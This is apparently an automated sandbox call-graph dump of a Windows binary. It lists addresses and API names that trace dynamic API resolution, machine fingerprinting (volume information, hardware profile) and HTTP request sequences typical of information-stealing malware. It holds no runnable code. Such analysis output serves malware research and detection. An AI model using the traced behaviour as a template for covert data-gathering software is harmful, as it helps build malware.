4022d0 11 API calls 89712->89713 89714 40313e 89713->89714 89715 4022d0 11 API calls 89714->89715 89716 403154 89715->89716 89717 4022d0 11 API calls 89716->89717 89718 40316a 89717->89718 89719 4022d0 11 API calls 89718->89719 89720 403180 89719->89720 89721 4022d0 11 API calls 89720->89721 89722 403196 89721->89722 89723 4022d0 11 API calls 89722->89723 89724 4031ac 89723->89724 89725 4022d0 11 API calls 89724->89725 89726 4031c5 89725->89726 89727 4022d0 11 API calls 89726->89727 89728 4031db 89727->89728 89729 4022d0 11 API calls 89728->89729 89730 4031f1 89729->89730 89731 4022d0 11 API calls 89730->89731 89732 403207 89731->89732 89733 4022d0 11 API calls 89732->89733 89734 40321d 89733->89734 89735 4022d0 11 API calls 89734->89735 89736 403233 89735->89736 89737 4022d0 11 API calls 89736->89737 89738 40324c 89737->89738 89739 4022d0 11 API calls 89738->89739 89740 403262 89739->89740 89741 4022d0 11 API calls 89740->89741 89742 403278 89741->89742 89743 4022d0 11 API calls 89742->89743 89744 40328e 89743->89744 89745 4022d0 11 API calls 89744->89745 89746 4032a4 89745->89746 89747 4022d0 11 API calls 89746->89747 89748 4032ba 89747->89748 89749 4022d0 11 API calls 89748->89749 89750 4032d3 89749->89750 89751 4022d0 11 API calls 89750->89751 89752 4032e9 89751->89752 89753 4022d0 11 API calls 89752->89753 89754 4032ff 89753->89754 89755 4022d0 11 API calls 89754->89755 89756 403315 89755->89756 89757 4022d0 11 API calls 89756->89757 89758 40332b 89757->89758 89759 4022d0 11 API calls 89758->89759 89760 403341 89759->89760 89761 4022d0 11 API calls 89760->89761 89762 40335a 89761->89762 89763 4022d0 11 API calls 89762->89763 89764 403370 89763->89764 89765 4022d0 11 API calls 89764->89765 89766 403386 89765->89766 89767 4022d0 11 API calls 89766->89767 89768 40339c 89767->89768 89769 4022d0 11 API calls 89768->89769 89770 4033b2 89769->89770 89771 4022d0 11 API calls 89770->89771 89772 4033c8 89771->89772 89773 4022d0 11 API calls 89772->89773 89774 4033e1 89773->89774 89775 4022d0 11 API calls 89774->89775 89776 4033f7 89775->89776 89777 4022d0 11 API calls 89776->89777 89778 40340d 89777->89778 89779 4022d0 11 API calls 89778->89779 89780 403423 89779->89780 89781 4022d0 11 API calls 89780->89781 89782 403439 89781->89782 89783 4022d0 11 API calls 89782->89783 89784 40344f 89783->89784 89785 4022d0 11 API calls 89784->89785 89786 403468 89785->89786 89787 4022d0 11 API calls 89786->89787 89788 40347e 89787->89788 89789 4022d0 11 API calls 89788->89789 89790 403494 89789->89790 89791 4022d0 11 API calls 89790->89791 89792 4034aa 89791->89792 89793 4022d0 11 API calls 89792->89793 89794 4034c0 89793->89794 89795 4022d0 11 API calls 89794->89795 89796 4034d6 89795->89796 89797 4022d0 11 API calls 89796->89797 89798 4034ef 89797->89798 89799 4022d0 11 API calls 89798->89799 89800 403505 89799->89800 89801 4022d0 11 API calls 89800->89801 89802 40351b 89801->89802 89803 4022d0 11 API calls 89802->89803 89804 403531 89803->89804 89805 4022d0 11 API calls 89804->89805 89806 403547 89805->89806 89807 4022d0 11 API calls 89806->89807 89808 40355d 89807->89808 89809 4022d0 11 API calls 89808->89809 89810 403576 89809->89810 89811 4022d0 11 API calls 89810->89811 89812 40358c 89811->89812 89813 4022d0 11 API calls 89812->89813 89814 4035a2 89813->89814 89815 4022d0 11 API calls 89814->89815 89816 4035b8 89815->89816 89817 4022d0 11 API calls 89816->89817 89818 4035ce 89817->89818 89819 4022d0 11 API calls 89818->89819 89820 4035e4 89819->89820 89821 4022d0 11 API calls 89820->89821 89822 4035fd 89821->89822 89823 4022d0 11 API calls 89822->89823 89824 403613 89823->89824 89825 4022d0 11 API calls 89824->89825 89826 403629 89825->89826 89827 4022d0 11 API calls 89826->89827 89828 40363f 89827->89828 89829 4022d0 11 API calls 89828->89829 89830 403655 89829->89830 89831 4022d0 11 API calls 89830->89831 89832 40366b 89831->89832 89833 4022d0 11 API calls 89832->89833 89834 403684 89833->89834 89835 4022d0 11 API calls 89834->89835 89836 40369a 89835->89836 89837 4022d0 11 API calls 89836->89837 89838 4036b0 89837->89838 89839 4022d0 11 API calls 89838->89839 89840 4036c6 89839->89840 89841 4022d0 11 API calls 89840->89841 89842 4036dc 89841->89842 89843 4022d0 11 API calls 89842->89843 89844 4036f2 89843->89844 89845 4022d0 11 API calls 89844->89845 89846 40370b 89845->89846 89847 4022d0 11 API calls 89846->89847 89848 403721 89847->89848 89849 4022d0 11 API calls 89848->89849 89850 403737 89849->89850 89851 4022d0 11 API calls 89850->89851 89852 40374d 89851->89852 89853 4022d0 11 API calls 89852->89853 89854 403763 89853->89854 89855 4022d0 11 API calls 89854->89855 89856 403779 89855->89856 89857 4022d0 11 API calls 89856->89857 89858 403792 89857->89858 89859 4022d0 11 API calls 89858->89859 89860 4037a8 89859->89860 89861 4022d0 11 API calls 89860->89861 89862 4037be 89861->89862 89863 4022d0 11 API calls 89862->89863 89864 4037d4 89863->89864 89865 4022d0 11 API calls 89864->89865 89866 4037ea 89865->89866 89867 4022d0 11 API calls 89866->89867 89868 403800 89867->89868 89869 4022d0 11 API calls 89868->89869 89870 403819 89869->89870 89871 4022d0 11 API calls 89870->89871 89872 40382f 89871->89872 89873 4022d0 11 API calls 89872->89873 89874 403845 89873->89874 89875 4022d0 11 API calls 89874->89875 89876 40385b 89875->89876 89877 4022d0 11 API calls 89876->89877 89878 403871 89877->89878 89879 4022d0 11 API calls 89878->89879 89880 403887 89879->89880 89881 4022d0 11 API calls 89880->89881 89882 4038a0 89881->89882 89883 4022d0 11 API calls 89882->89883 89884 4038b6 89883->89884 89885 4022d0 11 API calls 89884->89885 89886 4038cc 89885->89886 89887 4022d0 11 API calls 89886->89887 89888 4038e2 89887->89888 89889 4022d0 11 API calls 89888->89889 89890 4038f8 89889->89890 89891 4022d0 11 API calls 89890->89891 89892 40390e 89891->89892 89893 4022d0 11 API calls 89892->89893 89894 403927 89893->89894 89895 4022d0 11 API calls 89894->89895 89896 40393d 89895->89896 89897 4022d0 11 API calls 89896->89897 89898 403953 89897->89898 89899 4022d0 11 API calls 89898->89899 89900 403969 89899->89900 89901 4022d0 11 API calls 89900->89901 89902 40397f 89901->89902 89903 4022d0 11 API calls 89902->89903 89904 403995 89903->89904 89905 4022d0 11 API calls 89904->89905 89906 4039ae 89905->89906 89907 4022d0 11 API calls 89906->89907 89908 4039c4 89907->89908 89909 4022d0 11 API calls 89908->89909 89910 4039da 89909->89910 89911 4022d0 11 API calls 89910->89911 89912 4039f0 89911->89912 89913 4022d0 11 API calls 89912->89913 89914 403a06 89913->89914 89915 4022d0 11 API calls 89914->89915 89916 403a1c 89915->89916 89917 4022d0 11 API calls 89916->89917 89918 403a35 89917->89918 89919 4022d0 11 API calls 89918->89919 89920 403a4b 89919->89920 89921 4022d0 11 API calls 89920->89921 89922 403a61 89921->89922 89923 4022d0 11 API calls 89922->89923 89924 403a77 89923->89924 89925 4022d0 11 API calls 89924->89925 89926 403a8d 89925->89926 89927 4022d0 11 API calls 89926->89927 89928 403aa3 89927->89928 89929 4022d0 11 API calls 89928->89929 89930 403abc 89929->89930 89931 4022d0 11 API calls 89930->89931 89932 403ad2 89931->89932 89933 4022d0 11 API calls 89932->89933 89934 403ae8 89933->89934 89935 4022d0 11 API calls 89934->89935 89936 403afe 89935->89936 89937 4022d0 11 API calls 89936->89937 89938 403b14 89937->89938 89939 4022d0 11 API calls 89938->89939 89940 403b2a 89939->89940 89941 4022d0 11 API calls 89940->89941 89942 403b43 89941->89942 89943 4022d0 11 API calls 89942->89943 89944 403b59 89943->89944 89945 4022d0 11 API calls 89944->89945 89946 403b6f 89945->89946 89947 4022d0 11 API calls 89946->89947 89948 403b85 89947->89948 89949 4022d0 11 API calls 89948->89949 89950 403b9b 89949->89950 89951 4022d0 11 API calls 89950->89951 89952 403bb1 89951->89952 89953 4022d0 11 API calls 89952->89953 89954 403bca 89953->89954 89955 4022d0 11 API calls 89954->89955 89956 403be0 89955->89956 89957 4022d0 11 API calls 89956->89957 89958 403bf6 89957->89958 89959 4022d0 11 API calls 89958->89959 89960 403c0c 89959->89960 89961 4022d0 11 API calls 89960->89961 89962 403c22 89961->89962 89963 4022d0 11 API calls 89962->89963 89964 403c38 89963->89964 89965 4022d0 11 API calls 89964->89965 89966 403c51 89965->89966 89967 4022d0 11 API calls 89966->89967 89968 403c67 89967->89968 89969 4022d0 11 API calls 89968->89969 89970 403c7d 89969->89970 89971 4022d0 11 API calls 89970->89971 89972 403c93 89971->89972 89973 4022d0 11 API calls 89972->89973 89974 403ca9 89973->89974 89975 4022d0 11 API calls 89974->89975 89976 403cbf 89975->89976 89977 4022d0 11 API calls 89976->89977 89978 403cd8 89977->89978 89979 4022d0 11 API calls 89978->89979 89980 403cee 89979->89980 89981 4022d0 11 API calls 89980->89981 89982 403d04 89981->89982 89983 4022d0 11 API calls 89982->89983 89984 403d1a 89983->89984 89985 4022d0 11 API calls 89984->89985 89986 403d30 89985->89986 89987 4022d0 11 API calls 89986->89987 89988 403d46 89987->89988 89989 4022d0 11 API calls 89988->89989 89990 403d5f 89989->89990 89991 4022d0 11 API calls 89990->89991 89992 403d75 89991->89992 89993 4022d0 11 API calls 89992->89993 89994 403d8b 89993->89994 89995 4022d0 11 API calls 89994->89995 89996 403da1 89995->89996 89997 4022d0 11 API calls 89996->89997 89998 403db7 89997->89998 89999 4022d0 11 API calls 89998->89999 90000 403dcd 89999->90000 90001 4022d0 11 API calls 90000->90001 90002 403de6 90001->90002 90003 4022d0 11 API calls 90002->90003 90004 403dfc 90003->90004 90005 4022d0 11 API calls 90004->90005 90006 403e12 90005->90006 90007 4022d0 11 API calls 90006->90007 90008 403e28 90007->90008 90009 4022d0 11 API calls 90008->90009 90010 403e3e 90009->90010 90011 4022d0 11 API calls 90010->90011 90012 403e54 90011->90012 90013 4022d0 11 API calls 90012->90013 90014 403e6d 90013->90014 90015 4022d0 11 API calls 90014->90015 90016 403e83 90015->90016 90017 4022d0 11 API calls 90016->90017 90018 403e99 90017->90018 90019 4022d0 11 API calls 90018->90019 90020 403eaf 90019->90020 90021 4022d0 11 API calls 90020->90021 90022 403ec5 90021->90022 90023 4022d0 11 API calls 90022->90023 90024 403edb 90023->90024 90025 4022d0 11 API calls 90024->90025 90026 403ef4 90025->90026 90027 4022d0 11 API calls 90026->90027 90028 403f0a 90027->90028 90029 4022d0 11 API calls 90028->90029 90030 403f20 90029->90030 90031 4022d0 11 API calls 90030->90031 90032 403f36 90031->90032 90033 4022d0 11 API calls 90032->90033 90034 403f4c 90033->90034 90035 4022d0 11 API calls 90034->90035 90036 403f62 90035->90036 90037 4022d0 11 API calls 90036->90037 90038 403f7b 90037->90038 90039 4022d0 11 API calls 90038->90039 90040 403f91 90039->90040 90041 4022d0 11 API calls 90040->90041 90042 403fa7 90041->90042 90043 4022d0 11 API calls 90042->90043 90044 403fbd 90043->90044 90045 4022d0 11 API calls 90044->90045 90046 403fd3 90045->90046 90047 4022d0 11 API calls 90046->90047 90048 403fe9 90047->90048 90049 4022d0 11 API calls 90048->90049 90050 404002 90049->90050 90051 4022d0 11 API calls 90050->90051 90052 404018 90051->90052 90053 4022d0 11 API calls 90052->90053 90054 40402e 90053->90054 90055 4022d0 11 API calls 90054->90055 90056 404044 90055->90056 90057 4022d0 11 API calls 90056->90057 90058 40405a 90057->90058 90059 4022d0 11 API calls 90058->90059 90060 404070 90059->90060 90061 4022d0 11 API calls 90060->90061 90062 404089 90061->90062 90063 4022d0 11 API calls 90062->90063 90064 40409f 90063->90064 90065 4022d0 11 API calls 90064->90065 90066 4040b5 90065->90066 90067 4022d0 11 API calls 90066->90067 90068 4040cb 90067->90068 90069 4022d0 11 API calls 90068->90069 90070 4040e1 90069->90070 90071 4022d0 11 API calls 90070->90071 90072 4040f7 90071->90072 90073 4022d0 11 API calls 90072->90073 90074 404110 90073->90074 90075 4022d0 11 API calls 90074->90075 90076 404126 90075->90076 90077 4022d0 11 API calls 90076->90077 90078 40413c 90077->90078 90079 4022d0 11 API calls 90078->90079 90080 404152 90079->90080 90081 4022d0 11 API calls 90080->90081 90082 404168 90081->90082 90083 4022d0 11 API calls 90082->90083 90084 40417e 90083->90084 90085 4022d0 11 API calls 90084->90085 90086 404197 90085->90086 90087 4022d0 11 API calls 90086->90087 90088 4041ad 90087->90088 90089 4022d0 11 API calls 90088->90089 90090 4041c3 90089->90090 90091 4022d0 11 API calls 90090->90091 90092 4041d9 90091->90092 90093 4022d0 11 API calls 90092->90093 90094 4041ef 90093->90094 90095 4022d0 11 API calls 90094->90095 90096 404205 90095->90096 90097 4022d0 11 API calls 90096->90097 90098 40421e 90097->90098 90099 4022d0 11 API calls 90098->90099 90100 404234 90099->90100 90101 4022d0 11 API calls 90100->90101 90102 40424a 90101->90102 90103 4022d0 11 API calls 90102->90103 90104 404260 90103->90104 90105 4022d0 11 API calls 90104->90105 90106 404276 90105->90106 90107 4022d0 11 API calls 90106->90107 90108 40428c 90107->90108 90109 4022d0 11 API calls 90108->90109 90110 4042a5 90109->90110 90111 4022d0 11 API calls 90110->90111 90112 4042bb 90111->90112 90113 4022d0 11 API calls 90112->90113 90114 4042d1 90113->90114 90115 4022d0 11 API calls 90114->90115 90116 4042e7 90115->90116 90117 4022d0 11 API calls 90116->90117 90118 4042fd 90117->90118 90119 4022d0 11 API calls 90118->90119 90120 404313 90119->90120 90121 4022d0 11 API calls 90120->90121 90122 40432c 90121->90122 90123 4022d0 11 API calls 90122->90123 90124 404342 90123->90124 90125 4022d0 11 API calls 90124->90125 90126 404358 90125->90126 90127 4022d0 11 API calls 90126->90127 90128 40436e 90127->90128 90129 4022d0 11 API calls 90128->90129 90130 404384 90129->90130 90131 4022d0 11 API calls 90130->90131 90132 40439a 90131->90132 90133 4022d0 11 API calls 90132->90133 90134 4043b3 90133->90134 90135 418cb0 90134->90135 90136 418cbd 43 API calls 90135->90136 90137 4190ce 9 API calls 90135->90137 90136->90137 90138 419174 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90137->90138 90139 4191e8 90137->90139 90138->90139 90140 4192b2 90139->90140 90141 4191f5 8 API calls 90139->90141 90142 4192bb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90140->90142 90143 41932f 90140->90143 90141->90140 90142->90143 90144 4193c9 90143->90144 90145 41933c 6 API calls 90143->90145 90146 4193d6 9 API calls 90144->90146 90147 4194ac 90144->90147 90145->90144 90146->90147 90148 4194b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90147->90148 90149 419529 90147->90149 90148->90149 90150 419532 GetProcAddress GetProcAddress 90149->90150 90151 41955d 90149->90151 90150->90151 90152 419591 90151->90152 90153 419566 GetProcAddress GetProcAddress 90151->90153 90154 419689 90152->90154 90155 41959e 10 API calls 90152->90155 90153->90152 90156 419692 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90154->90156 90157 4196ee 90154->90157 90155->90154 90156->90157 90158 4196f7 GetProcAddress 90157->90158 90159 41970a 90157->90159 90158->90159 90160 419713 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90159->90160 90161 41976f 90159->90161 90160->90161 90162 41807f 90161->90162 90163 419778 GetProcAddress 90161->90163 90164 4114d0 90162->90164 90163->90162 90165 40fe80 lstrcpy 90164->90165 90166 411505 90165->90166 90167 40fe80 lstrcpy 90166->90167 90168 41151e GetSystemTime 90167->90168 90169 41153d 90168->90169 90169->89407 90171 40fec0 lstrcpy 90170->90171 90172 401159 90171->90172 90173 40fec0 lstrcpy 90172->90173 90174 40116c 90173->90174 90175 40fec0 lstrcpy 90174->90175 90176 40117c 90175->90176 90177 40fec0 lstrcpy 90176->90177 90178 401198 90177->90178 90179 414650 90178->90179 90180 414688 90179->90180 90181 40ff10 2 API calls 90180->90181 90182 4146b1 90181->90182 90183 40ff10 2 API calls 90182->90183 90184 4146be 90183->90184 90185 40ff10 2 API calls 90184->90185 90186 4146cb 90185->90186 90187 40fe80 lstrcpy 90186->90187 90188 4146d8 90187->90188 90189 40fe80 lstrcpy 90188->90189 90190 4146e9 90189->90190 90191 40fe80 lstrcpy 90190->90191 90192 4146fa 90191->90192 90193 40fe80 lstrcpy 90192->90193 90194 41470e 90193->90194 90195 40fe80 lstrcpy 90194->90195 90196 41471f 90195->90196 90197 40fe80 lstrcpy 90196->90197 90310 414733 90197->90310 90198 4023f0 lstrcpy 90198->90310 90200 402450 lstrcpy 90200->90310 90201 414860 StrCmpCA 90201->90310 90202 4148f5 StrCmpCA 90203 41550b 90202->90203 90202->90310 90204 40ff60 lstrcpy 90203->90204 90205 415517 90204->90205 91285 402450 90205->91285 90208 414acb StrCmpCA 90211 4153f0 90208->90211 90208->90310 90209 40ff60 lstrcpy 90210 415530 90209->90210 91288 4026e0 lstrcpy 90210->91288 90212 40ff60 lstrcpy 90211->90212 90214 4153fc 90212->90214 90213 402480 lstrcpy 90213->90310 91283 4024e0 lstrcpy 90214->91283 90218 415405 90220 40ff60 lstrcpy 90218->90220 90219 415544 90221 40ff60 lstrcpy 90219->90221 90223 415415 90220->90223 90224 415554 90221->90224 90222 414cba StrCmpCA 90225 4152d2 90222->90225 90222->90310 91284 402710 lstrcpy 90223->91284 90231 40fec0 lstrcpy 90224->90231 90226 40ff60 lstrcpy 90225->90226 90228 4152e1 90226->90228 90227 402510 lstrcpy 90227->90310 91281 402570 lstrcpy 90228->91281 90235 41556d 90231->90235 90233 4152ea 90237 40ff60 lstrcpy 90233->90237 90234 415429 90238 40ff60 lstrcpy 90234->90238 90239 40fec0 lstrcpy 90235->90239 90236 414e90 StrCmpCA 90240 4151b1 90236->90240 90236->90310 90241 4152fa 90237->90241 90242 415439 90238->90242 90243 41557d 90239->90243 90245 40ff60 lstrcpy 90240->90245 91282 402740 lstrcpy 90241->91282 90253 40fec0 lstrcpy 90242->90253 90247 40fec0 lstrcpy 90243->90247 90244 401130 lstrcpy 90244->90310 90248 4151bd 90245->90248 90246 402570 lstrcpy 90246->90310 90292 415118 90247->90292 91279 402600 lstrcpy 90248->91279 90249 414a36 StrCmpCA 90249->90310 90257 415452 90253->90257 90254 4151c6 90260 40ff60 lstrcpy 90254->90260 90255 4024e0 lstrcpy 90255->90310 90256 41530e 90261 40ff60 lstrcpy 90256->90261 90258 40fec0 lstrcpy 90257->90258 90263 415462 90258->90263 90259 415072 StrCmpCA 90264 41508d 90259->90264 90265 41507d Sleep 90259->90265 90266 4151d6 90260->90266 90262 41531e 90261->90262 90276 40fec0 lstrcpy 90262->90276 90267 40fec0 lstrcpy 90263->90267 90268 40ff60 lstrcpy 90264->90268 90265->90310 91280 402770 lstrcpy 90266->91280 90267->90292 90272 41509c 90268->90272 90269 413ea0 29 API calls 90269->90310 90270 402630 lstrcpy 90270->90310 90271 414c18 StrCmpCA 90271->90310 91277 402690 lstrcpy 90272->91277 90279 415337 90276->90279 90277 4151ed 90280 40ff60 lstrcpy 90277->90280 90278 4150a5 90282 40ff60 lstrcpy 90278->90282 90283 40fec0 lstrcpy 90279->90283 90285 4151fd 90280->90285 90281 4025a0 lstrcpy 90281->90310 90286 4150b5 90282->90286 90287 415347 90283->90287 90284 40ff60 lstrcpy 90284->90310 90293 40fec0 lstrcpy 90285->90293 91278 4027a0 lstrcpy 90286->91278 90289 40fec0 lstrcpy 90287->90289 90288 402690 lstrcpy 90288->90310 90289->90292 90290 414dfb StrCmpCA 90290->90310 90291 40fec0 lstrcpy 90291->90310 90292->89413 90296 415219 90293->90296 90295 402600 lstrcpy 90295->90310 90298 40fec0 lstrcpy 90296->90298 90297 4150cc 90299 40ff60 lstrcpy 90297->90299 90300 415229 90298->90300 90301 4150dc 90299->90301 90302 40fec0 lstrcpy 90300->90302 90304 40fec0 lstrcpy 90301->90304 90302->90292 90303 414fdd StrCmpCA 90303->90310 90305 4150f8 90304->90305 90306 40fec0 lstrcpy 90305->90306 90307 415108 90306->90307 90309 40fec0 lstrcpy 90307->90309 90308 413d40 24 API calls 90308->90310 90309->90292 90310->90198 90310->90200 90310->90201 90310->90202 90310->90208 90310->90213 90310->90222 90310->90227 90310->90236 90310->90244 90310->90246 90310->90249 90310->90255 90310->90259 90310->90269 90310->90270 90310->90271 90310->90281 90310->90284 90310->90288 90310->90290 90310->90291 90310->90295 90310->90303 90310->90308 91270 402420 90310->91270 91273 4024b0 lstrcpy 90310->91273 91274 402540 lstrcpy 90310->91274 91275 4025d0 lstrcpy 90310->91275 91276 402660 lstrcpy 90310->91276 90312 40fed7 90311->90312 90313 40feee 90312->90313 90314 40fee6 lstrcpy 90312->90314 90313->89426 90314->90313 90316 40fffb 90315->90316 90317 410025 90316->90317 90318 410011 lstrcpy lstrcat 90316->90318 90317->89432 90318->90317 90319->89436 90321 40fe80 lstrcpy 90320->90321 90322 4023db 90321->90322 90323 410d90 GetWindowsDirectoryA 90322->90323 90324 410dd2 90323->90324 90325 410dd9 GetVolumeInformationA 90323->90325 90324->90325 90326 410e10 90325->90326 90327 410e46 GetProcessHeap HeapAlloc 90326->90327 90328 410e60 90327->90328 90329 410e7c wsprintfA lstrcat 90327->90329 90330 40fe80 lstrcpy 90328->90330 91289 410d30 GetCurrentHwProfileA 90329->91289 90332 410e6b 90330->90332 90332->89442 90333 410eaf 90334 410ec1 lstrlen 90333->90334 90335 410ed6 90334->90335 91296 411bd0 lstrcpy malloc strncpy 90335->91296 90337 410ee0 90338 410eee lstrcat 90337->90338 90339 410f02 90338->90339 90340 40fe80 lstrcpy 90339->90340 90341 410f15 90340->90341 90341->89442 90343 40fec0 lstrcpy 90342->90343 90344 4044d0 90343->90344 91297 4043c0 90344->91297 90346 4044dc 90347 40fe80 lstrcpy 90346->90347 90348 4044fd 90347->90348 90349 40fe80 lstrcpy 90348->90349 90350 404511 90349->90350 90351 40fe80 lstrcpy 90350->90351 90352 404522 90351->90352 90353 40fe80 lstrcpy 90352->90353 90354 404533 90353->90354 90355 40fe80 lstrcpy 90354->90355 90356 404544 90355->90356 90357 404559 InternetOpenA StrCmpCA 90356->90357 90358 404584 90357->90358 90359 404af8 InternetCloseHandle 90358->90359 90360 4114d0 2 API calls 90358->90360 90373 404b0a 90359->90373 90361 40459e 90360->90361 90362 40ffb0 2 API calls 90361->90362 90363 4045b2 90362->90363 90364 40ff60 lstrcpy 90363->90364 90365 4045bf 90364->90365 90366 410040 3 API calls 90365->90366 90367 4045e7 90366->90367 90368 40ff60 lstrcpy 90367->90368 90369 4045f4 90368->90369 90370 410040 3 API calls 90369->90370 90371 404610 90370->90371 90372 40ff60 lstrcpy 90371->90372 90374 40461d 90372->90374 90373->89446 90375 40ffb0 2 API calls 90374->90375 90376 404638 90375->90376 90377 40ff60 lstrcpy 90376->90377 90378 404645 90377->90378 90379 410040 3 API calls 90378->90379 90380 404661 90379->90380 90381 40ff60 lstrcpy 90380->90381 90382 40466e 90381->90382 90383 410040 3 API calls 90382->90383 90384 40468a 90383->90384 90385 40ff60 lstrcpy 90384->90385 90386 404697 90385->90386 90387 410040 3 API calls 90386->90387 90388 4046b4 90387->90388 90389 40ffb0 2 API calls 90388->90389 90390 4046c7 90389->90390 90391 40ff60 lstrcpy 90390->90391 90392 4046d4 90391->90392 90393 4046eb InternetConnectA 90392->90393 90393->90359 90394 404717 HttpOpenRequestA 90393->90394 90395 404755 90394->90395 90396 404aeb InternetCloseHandle 90394->90396 90397 404771 90395->90397 90398 40475b InternetSetOptionA 90395->90398 90396->90359 90399 410040 3 API calls 90397->90399 90398->90397 90400 404782 90399->90400 90401 40ff60 lstrcpy 90400->90401 90402 40478f 90401->90402 90403 40ffb0 2 API calls 90402->90403 90404 4047aa 90403->90404 90405 40ff60 lstrcpy 90404->90405 90406 4047b7 90405->90406 90407 410040 3 API calls 90406->90407 90408 4047d3 90407->90408 90409 40ff60 lstrcpy 90408->90409 90410 4047e0 90409->90410 90411 410040 3 API calls 90410->90411 90412 4047fe 90411->90412 90413 40ff60 lstrcpy 90412->90413 90414 40480b 90413->90414 90415 410040 3 API calls 90414->90415 90416 404827 90415->90416 90417 40ff60 lstrcpy 90416->90417 90418 404834 90417->90418 90419 410040 3 API calls 90418->90419 90420 404850 90419->90420 90421 40ff60 lstrcpy 90420->90421 90422 40485d 90421->90422 90423 40ffb0 2 API calls 90422->90423 90424 404878 90423->90424 90425 40ff60 lstrcpy 90424->90425 90426 404885 90425->90426 90427 410040 3 API calls 90426->90427 90428 4048a1 90427->90428 90429 40ff60 lstrcpy 90428->90429 90430 4048ae 90429->90430 90431 410040 3 API calls 90430->90431 90432 4048ca 90431->90432 90433 40ff60 lstrcpy 90432->90433 90434 4048d7 90433->90434 90435 40ffb0 2 API calls 90434->90435 90436 4048f2 90435->90436 90437 40ff60 lstrcpy 90436->90437 90438 4048ff 90437->90438 90439 410040 3 API calls 90438->90439 90440 40491b 90439->90440 90441 40ff60 lstrcpy 90440->90441 90442 404928 90441->90442 90443 410040 3 API calls 90442->90443 90444 404946 90443->90444 90445 40ff60 lstrcpy 90444->90445 90446 404953 90445->90446 90447 410040 3 API calls 90446->90447 90448 40496f 90447->90448 90449 40ff60 lstrcpy 90448->90449 90450 40497c 90449->90450 90451 410040 3 API calls 90450->90451 90452 404998 90451->90452 90453 40ff60 lstrcpy 90452->90453 90454 4049a5 90453->90454 90455 40ffb0 2 API calls 90454->90455 90456 4049c0 90455->90456 90457 40ff60 lstrcpy 90456->90457 90458 4049cd 90457->90458 90459 40fe80 lstrcpy 90458->90459 90460 4049e5 90459->90460 90461 40ffb0 2 API calls 90460->90461 90462 4049f9 90461->90462 90463 40ffb0 2 API calls 90462->90463 90464 404a0c 90463->90464 90465 40ff60 lstrcpy 90464->90465 90466 404a19 90465->90466 90467 404a39 lstrlen 90466->90467 90468 404a49 90467->90468 90469 404a52 lstrlen 90468->90469 91305 410120 90469->91305 90471 404a62 HttpSendRequestA InternetReadFile 90472 404a85 90471->90472 90473 404ad9 InternetCloseHandle 90471->90473 90472->90473 90477 404a8c 90472->90477 91306 40ff00 90473->91306 90475 410040 3 API calls 90475->90477 90476 40ff60 lstrcpy 90476->90477 90477->90475 90477->90476 90478 404abe InternetReadFile 90477->90478 90478->90472 90478->90473 91310 410120 90479->91310 90481 4128a7 StrCmpCA 90482 4128b2 ExitProcess 90481->90482 90483 4128b9 90481->90483 90484 4128c9 strtok_s 90483->90484 90485 412a1b 90484->90485 90498 4128da 90484->90498 90485->89448 90486 4129ff strtok_s 90486->90485 90486->90498 90487 4129b1 StrCmpCA 90487->90486 90488 412910 StrCmpCA 90488->90486 90488->90498 90489 412972 StrCmpCA 90489->90486 90489->90498 90490 4128f4 StrCmpCA 90490->90486 90490->90498 90491 412987 StrCmpCA 90491->90486 90491->90498 90492 4129c7 StrCmpCA 90492->90486 90493 412948 StrCmpCA 90493->90486 90493->90498 90494 4129eb StrCmpCA 90494->90486 90495 41292c StrCmpCA 90495->90486 90495->90498 90496 41299c StrCmpCA 90496->90486 90496->90498 90497 40ff10 2 API calls 90497->90498 90498->90486 90498->90487 90498->90488 90498->90489 90498->90490 90498->90491 90498->90492 90498->90493 90498->90494 90498->90495 90498->90496 90498->90497 90500 40fec0 lstrcpy 90499->90500 90501 405cd0 90500->90501 90502 4043c0 5 API calls 90501->90502 90503 405cdc 90502->90503 90504 40fe80 lstrcpy 90503->90504 90505 405cfd 90504->90505 90506 40fe80 lstrcpy 90505->90506 90507 405d11 90506->90507 90508 40fe80 lstrcpy 90507->90508 90509 405d22 90508->90509 90510 40fe80 lstrcpy 90509->90510 90511 405d33 90510->90511 90512 40fe80 lstrcpy 90511->90512 90513 405d44 90512->90513 90514 405d59 InternetOpenA StrCmpCA 90513->90514 90515 405d84 90514->90515 90516 40646f InternetCloseHandle 90515->90516 90517 4114d0 2 API calls 90515->90517 90518 406485 90516->90518 90519 405d9e 90517->90519 91317 406f10 CryptStringToBinaryA 90518->91317 90520 40ffb0 2 API calls 90519->90520 90522 405db2 90520->90522 90524 40ff60 lstrcpy 90522->90524 90523 40648b 90525 40ff10 2 API calls 90523->90525 90541 4064b9 90523->90541 90528 405dbf 90524->90528 90526 40649e 90525->90526 90527 410040 3 API calls 90526->90527 90529 4064ad 90527->90529 90531 410040 3 API calls 90528->90531 90530 40ff60 lstrcpy 90529->90530 90530->90541 90532 405de7 90531->90532 90533 40ff60 lstrcpy 90532->90533 90534 405df4 90533->90534 90535 410040 3 API calls 90534->90535 90536 405e10 90535->90536 90537 40ff60 lstrcpy 90536->90537 90538 405e1d 90537->90538 90539 40ffb0 2 API calls 90538->90539 90540 405e38 90539->90540 90542 40ff60 lstrcpy 90540->90542 90541->89454 90543 405e45 90542->90543 90544 410040 3 API calls 90543->90544 90545 405e61 90544->90545 90546 40ff60 lstrcpy 90545->90546 90547 405e6e 90546->90547 90548 410040 3 API calls 90547->90548 90549 405e8a 90548->90549 90550 40ff60 lstrcpy 90549->90550 90551 405e97 90550->90551 90552 410040 3 API calls 90551->90552 90553 405eb4 90552->90553 90554 40ffb0 2 API calls 90553->90554 90555 405ec7 90554->90555 90556 40ff60 lstrcpy 90555->90556 90557 405ed4 90556->90557 90558 405eeb InternetConnectA 90557->90558 90559 405f17 HttpOpenRequestA 90558->90559 90560 40646c 90558->90560 90561 406465 InternetCloseHandle 90559->90561 90562 405f55 90559->90562 90560->90516 90561->90560 90563 405f71 90562->90563 90564 405f5b InternetSetOptionA 90562->90564 90565 410040 3 API calls 90563->90565 90564->90563 90566 405f82 90565->90566 90567 40ff60 lstrcpy 90566->90567 90568 405f8f 90567->90568 90569 40ffb0 2 API calls 90568->90569 90570 405faa 90569->90570 90571 40ff60 lstrcpy 90570->90571 90572 405fb7 90571->90572 90573 410040 3 API calls 90572->90573 90574 405fd3 